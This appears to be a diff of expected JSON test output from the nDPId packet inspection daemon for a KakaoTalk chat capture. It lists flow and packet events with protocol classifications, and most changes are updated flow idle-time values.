+00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1430069044940,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069044940,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLTe0AAQAZ+QwoYUryLlgB9t2MBu1EoA+JiI9GcUBiIgH9kAAAmAAAApDlIVrVdqRc+Gkt7POZ3i2OlX+Y4MArPTZYlBp4hfXC7UiHVW\/8="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":298,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1430069048642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069048642,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgkakAAjgapGtJn8A8KGFK8AbulXNdU3uvmK0ykUBSkj1vNAAA="} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069049770,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069049770,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1430069049770,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069049770,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUZ0AAQAZSqgoYUrytwki8h34UbGWkOWcyCtXvgBgB12cmAAABAQgKAAKaQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069060011,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069060011,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1430069060011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069060011,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkUAAQAbmZgoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069072945,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTTnkAAQAbVigoYUrw2\/\/3H5i8UZ+uf0YYGiXPCgBQCY5HBAAABAQgKAAKjTTTnT0k="} +00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069072986,"flow_last_seen":1430069072986,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069072986,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1430069072986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069072986,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwsMEAAQAZ88QoYUrw2\/\/3H5lQUZzqvj2AAAAAAoAI2sJHJAAACBAV4BAIICgACo1AAAAAAAQMDBQ=="} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1430069073186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069073186,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQa8ITb\/\/ccKGFK8FGfmVG+Fj0U6r49hoBJF6jkFAAACBAV4BAIICjTom84AAqNQAQMDCA=="} +00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1430069073186,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069073186,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQsMUAAQAZ8+AoYUrw2\/\/3H5lQUZzqvj2FvhY9GgBABtpHBAAABAQgKAAKjZTTom84="} +01084{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069072986,"flow_last_seen":1430069073201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1430069073201,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"d9ce50c62ab1fd5932da3c6b6d406c65","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022058,"flow_last_seen":1430069022094,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":41909,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1430069030508,"flow_last_seen":1430069052317,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1430069035840,"flow_last_seen":1430069057806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37557,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00835{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1430069031042,"flow_last_seen":1430069032022,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":7723,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1430069026370,"flow_last_seen":1430069037135,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5411,"flow_avg_l4_payload_len":142,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1430069036068,"flow_last_seen":1430069065046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":5108,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35511,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031611,"flow_last_seen":1430069072945,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":22,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58927,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069072986,"flow_last_seen":1430069073299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1466,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.253.199","src_port":58964,"dst_port":5223,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022059,"flow_last_seen":1430069022093,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":58810,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022105,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":56820,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069021959,"flow_last_seen":1430069022041,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":38448,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030119,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.191.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069030083,"flow_last_seen":1430069030115,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":112,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":61011,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1430069022100,"flow_last_seen":1430069022234,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":117,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":5929,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"}} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":347,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069073299,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 